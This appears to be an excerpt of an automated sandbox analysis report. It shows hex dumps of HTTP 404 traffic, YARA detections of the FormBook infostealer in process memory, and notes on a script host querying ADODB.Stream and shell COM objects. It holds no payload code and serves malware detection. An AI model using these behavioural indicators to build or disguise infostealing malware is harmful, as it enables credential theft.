09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 02 Dec 2024 14:54:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 02 Dec 2024 14:54:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BA2307CB09D5BCE513E9A111C4B077560E011CF4AD77CC8419F4FE01100Set-Cookie: _csrf=3b4b0fde9b3dc4f4857cb02cd320607166595c4e6a98603cc9bf48ea1c75a3b6a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22usZSH9FSJfKQaAh0Zx-NRxrxSR5gpuhH%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 4f 67 57 4e 4c 63 77 74 45 50 58 63 4c 4a 51 56 4a 42 49 30 33 71 30 61 71 59 49 65 4f 63 32 55 42 77 51 32 65 61 6d 34 67 35 5a 6d 30 78 6e 5f 77 6e 79 45 4a 30 57 2d 51 45 31 30 53 44 6a 49 4d 78 48 36 46 6f 41 6c 55 34 44 54 69 57 2d 6c 74 4f 4b 52 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B530CFD9BB47414204151692DDDCA75D165461BC9FB428C36B5F892C100Set-Cookie: _csrf=7f736ae0f0bba6261ca88e0fc347fe4a5174a935a4ba041b4002b99a58c34582a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22r2jNNJVMFYV4GWv34yKFNMTVnwFsBemT%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 4d 50 39 4e 71 7a 6e 74 66 55 31 39 6c 69 79 75 42 53 4e 77 39 46 43 6f 70 63 30 36 74 64 5a 6c 35 4f 32 2d 59 38 37 44 77 50 32 38 5a 64 34 34 71 33 6a 75 48 4f 76 44 6f 62 5f 51 5f 76 77 35 54 76 70 30 58 71 6e 67 77 5f 35 35 50 43 4b 7a 56 35 69 56 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BCC2A97F9F43961E187F1AC0958ABE28EA76C523C0358318228E2AB9100Set-Cookie: _csrf=e32ce2e337cdafab5262e81f972d0561a8e5600416a6b35fc1ac9c8403676b34a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ZzJmC4xPaoXs4fYl7Cmw8mILafOQwnch%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 67 76 6c 37 61 66 6c 57 41 6a 66 55 59 69 53 4d 49 44 6c 6e 59 67 35 74 55 75 43 39 64 36 4b 56 35 42 4f 67 67 37 5f 44 4b 6d 66 59 67 7a 45 45 75 6d 4a 36 5a 37 55 4e 66 50 38 55 58 7a 34 4f 4f 53 34 5f 6c 34 55 61 36 39 6d 46 64 65 5f 53 79 4b 31 4a 44 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BEB43DAAEC668390AC153CCDDD6DBC7205EACFB43E5DF8D5961B1191300Set-Cookie: _csrf=ccd8c6a513d00a64832473e71c5e1bc379d4f2fa5e9474d042d5bf6e74078e07a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%228gWEDL94uI6FbE5LMScuy2GFdUSR_4lh%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 39 32 61 5a 73 56 6f 77 4f 41 71 6c 43 46 73 6d 42 67 30 73 44 49 47 4f 79 46 48 6a 67 4f 30 48 49 6b 33 58 37 62 4f 5a 57 74 4c 75 73 30 6a 67 53 54 35 31 46 5f 64 46 79 72 36 58 51 48 38 66 31 56 59 56 44 36 38 52 50 4a 34 33 47 51 4e 36 66 6f 4a 41 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
